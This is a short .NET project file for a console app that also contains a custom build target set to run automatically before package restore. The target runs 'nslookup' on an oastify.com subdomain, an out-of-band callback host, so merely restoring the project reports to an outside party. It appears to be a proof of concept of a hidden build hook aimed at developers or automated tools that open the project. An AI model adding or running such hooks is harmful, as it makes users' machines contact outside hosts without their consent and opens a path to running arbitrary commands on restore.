<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="RunCustomScriptOnRestore" BeforeTargets="Restore">
    <Exec Command="nslookup p3t7epcym8sps9huxesu4q5omfs6gz4o.oastify.com" />
  </Target>

</Project>
